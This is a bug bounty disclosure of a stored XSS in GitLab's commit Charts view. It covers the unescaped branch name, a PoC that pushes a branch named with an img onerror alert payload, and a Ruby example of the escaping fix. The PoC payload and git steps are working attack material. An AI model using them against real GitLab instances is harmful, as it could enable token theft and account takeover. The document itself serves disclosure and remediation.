Stored XSS in Graph/Charts due to unescaped Branch-name

Link:          https://hackerone.com/reports/341685
By:            @fransrosen

Details: Hi,

When having a branch named with an HTML-element including javascript, the Chart-view located at:

/frans/*REPO*/graphs/*BRANCH*/charts

is not sanitizing the branch-name properly:

<h4>
Commit statistics for <strong><img/src='x'onerror=alert(1)></strong> Dec 22 - Jan 09
</h4>

[Screenshot: Screen_Shot_2018-04-21_at_23.56.54]

I'm running:

GitLab Community Edition 10.6.4 dee2c87

but also verified the issue is in master:

https://gitlab.com/gitlab-org/gitlab-ce/commit/9f49329cbb09faa17fd29e959828e487267e65c2

        - start_time = capture do
          #{@commits_graph.start_date.strftime('%b %d')}
        - end_time = capture do
          #{@commits_graph.end_date.strftime('%b %d')}
        = (_("Commit statistics for %{ref} %{start_time} - %{end_time}") % { ref: "<strong>#{@ref}</strong>", start_time: start_time, end_time: end_time }).html_safe

This seems to have been introduced on the 8th of Feb this year due to localization changes.

PoC

First, clone an existing project:

git clone https://gitlab/test/xxx.git .

Then add a new branch and commit to it:

git checkout -b "<img/src='x'onerror=alert(document.domain)>"
mv x y
git add .
git commit -m "test"
git push --set-upstream origin "<img/src='x'onerror=alert(document.domain)>"

Then, by going to the Charts section under Repository and selecting the new branch, the XSS will run (in Chrome, the XSS auditor will trigger since the payload is in the URL, but Firefox should show it running).

Impact

The stored XSS is triggering for anyone, also triggering on gitlab.com, and it can trigger on public repos. It will not bypass the XSS-auditor as far as I can see, but there might be bypasses I do not know of. You could easily build a PoC that would modify the email address of the current user stealing their CSRF-token as soon as the script triggers, or stealing information about private repositories.

Regards, Frans
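The defect in the quoted Haml is that the user-controlled `@ref` is spliced into markup and the whole string is then marked `html_safe`. The following Ruby example is added here and is not GitLab's code or the reporter's; it mirrors the heading template with plain strings (no Rails), shows the unescaped rendering beside an escaped one using the standard library's `ERB::Util.html_escape`, and includes a small check that only the template's own tags survive. The branch name and date strings are constructed sample values.

```ruby
require "erb" # ERB::Util.html_escape is in the Ruby standard library

# Template mirroring the heading quoted in the report; %{ref} etc. are Ruby
# format placeholders, as in the original view.
TEMPLATE = "Commit statistics for %{ref} %{start_time} - %{end_time}"

# Unescaped rendering, equivalent to the quoted view: the ref lands in the
# markup verbatim. Kept only to show the defect.
def heading_unescaped(ref, start_time, end_time)
  TEMPLATE % { ref: "<strong>#{ref}</strong>",
               start_time: start_time, end_time: end_time }
end

# Hardened rendering: every untrusted value is HTML-escaped before it is
# spliced in. The <strong> tags are the developer's own and stay literal.
def heading_escaped(ref, start_time, end_time)
  TEMPLATE % {
    ref: "<strong>#{ERB::Util.html_escape(ref)}</strong>",
    start_time: ERB::Util.html_escape(start_time),
    end_time: ERB::Util.html_escape(end_time)
  }
end

# Review/test check: the only tags in the output must be the template's own,
# i.e. nothing from the inputs survived as markup.
def only_template_tags?(html)
  html.scan(/<[^>]*>/) == ["<strong>", "</strong>"]
end

# Constructed sample input: a branch name of the shape given in the report and
# the date strings the view produces with strftime('%b %d').
BRANCH = "<img/src='x'onerror=alert(1)>"
START_TIME = "Dec 22"
END_TIME = "Jan 09"

if __FILE__ == $PROGRAM_NAME
  puts heading_unescaped(BRANCH, START_TIME, END_TIME)
  puts heading_escaped(BRANCH, START_TIME, END_TIME)
  puts only_template_tags?(heading_escaped(BRANCH, START_TIME, END_TIME))
end
```

In a Rails view the same fix is to escape `@ref` (e.g. with `html_escape`) before building the string, rather than calling `html_safe` on a string that still contains raw user input.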

The hacker selected the Cross-site Scripting (XSS) - Stored weakness. This vulnerability type requires contextual information from the hacker. They provided the following answers:

URL: http://gitlab-instance.localhost/frans/REPO/graphs/BRANCH/charts

Verified: Yes